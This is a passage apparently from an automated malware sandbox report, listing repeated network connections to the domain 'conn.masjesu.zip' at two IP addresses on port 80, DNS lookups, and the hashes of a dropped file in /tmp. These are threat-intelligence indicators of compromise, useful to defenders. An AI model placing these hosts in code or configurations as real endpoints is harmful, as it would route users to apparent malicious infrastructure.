| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
Files
/tmp/UoRyl2lhutvMau6FiKPjhLoLMl3xhNH2fP
| MD5 | 998368d7c95ea4293237f2320546e440 |
| SHA1 | 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4 |
| SHA256 | 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736 |
| SHA512 | 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97 |